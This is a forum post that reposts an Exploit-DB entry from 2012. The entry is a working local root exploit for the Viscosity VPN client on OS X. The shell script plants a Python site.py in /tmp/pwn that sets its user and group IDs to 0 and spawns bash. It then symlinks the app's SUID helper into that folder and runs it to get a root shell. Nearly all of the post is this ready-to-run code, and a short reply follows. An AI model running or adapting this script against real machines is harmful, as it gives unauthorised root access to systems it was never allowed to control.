DarkyAngel Posted August 13, 2012 Report Posted August 13, 2012 [table=width: 500, class: grid][tr] [td]EDB-ID: 20485[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td][/tr][tr] [td]Author: zx2c4[/td] [td]Published: 2012-08-13[/td] [td]Verified: [/td][/tr][tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td][/tr][/table]#!/bin/sh############################ Viscatory ## ## zx2c4 ############################# After the hullabaloo from the Tunnelblick local root, savy Mac users# began defending Viscosity, another OS X VPN client. They figured, since# they spent money on Viscosity, surely it would be better designed than# the free open-source alternative.## Unfortunately, this exploit took all of 2 minutes to find. DTrace for# the win. Here, the SUID helper will execute site.py in its enclosing# folder. A simple symlink, and we have root.# # greets to jono## Source: http://git.zx2c4.com/Viscatory/tree/viscatory.shecho "[+] Crafting payload."mkdir -p -v /tmp/pwncat > /tmp/pwn/site.py <<_EOFimport osprint "[+] Cleaning up."os.system("rm -rvf /tmp/pwn")print "[+] Getting root."os.setuid(0)os.setgid(0)os.execl("/bin/bash", "bash")_EOFecho "[+] Making symlink."ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/rootecho "[+] Running vulnerable SUID helper."exec /tmp/pwn/rootSursa Quote
Zatarra Posted August 13, 2012 Report Posted August 13, 2012 Fuck.. ii pentru MAC-uri, si eu care vroiam sa fac o automatizare pt el.. Quote
